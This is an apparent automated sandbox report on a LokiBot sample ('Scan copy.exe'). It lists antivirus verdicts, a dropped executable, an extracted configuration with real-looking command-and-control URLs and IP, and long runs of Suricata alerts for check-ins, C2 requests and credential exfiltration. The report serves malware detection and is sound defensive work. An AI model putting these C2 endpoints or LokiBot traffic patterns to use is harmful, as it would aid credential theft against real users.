2024-11-28T09:16:02.889650+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:04.587142+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:06.389002+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:08.095796+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:09.797793+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:11.614597+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:13.446836+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:15.111182+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.7	50012	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Scan copy.exe

Avira: detected

Antivirus detection for URL or domain

Source: 94.156.177.41/simple/five/fre.php	Avira URL Cloud: Label: malware
Source: http://94.156.177.41/simple/five/fre.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Avira: detection malicious, Label: HEUR/AGEN.1307356

Found malware configuration

Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}

Multi AV Scanner detection for domain / URL

Source: http://94.156.177.41/simple/five/fre.php	Virustotal: Detection: 17%			Perma Link
Source: 94.156.177.41/simple/five/fre.php	Virustotal: Detection: 17%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: Scan copy.exe	Virustotal: Detection: 32%			Perma Link
Source: Scan copy.exe	ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Scan copy.exe

Joe Sandbox ML: detected

Source: Scan copy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Scan copy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 4x nop then jmp 06C8D9B3h		0_2_06C8D290
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Code function: 4x nop then jmp 0797CC1Eh		13_2_0797C4FA

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49703 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49770
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49739
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49707
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49722
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49703 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49755
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49745
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49703 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49785
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49703 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49795
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49814
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49833 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49760
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49775
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49833
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49893 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49893 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49799
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49893 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49869
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49859 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49874 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49874 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49804
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49893 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49893 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49893
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49764 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49779 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49909 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49909 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49909 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49874 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49709
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49764
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49874 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49874 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49779
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49730
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49859
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 94.156.177.41:80
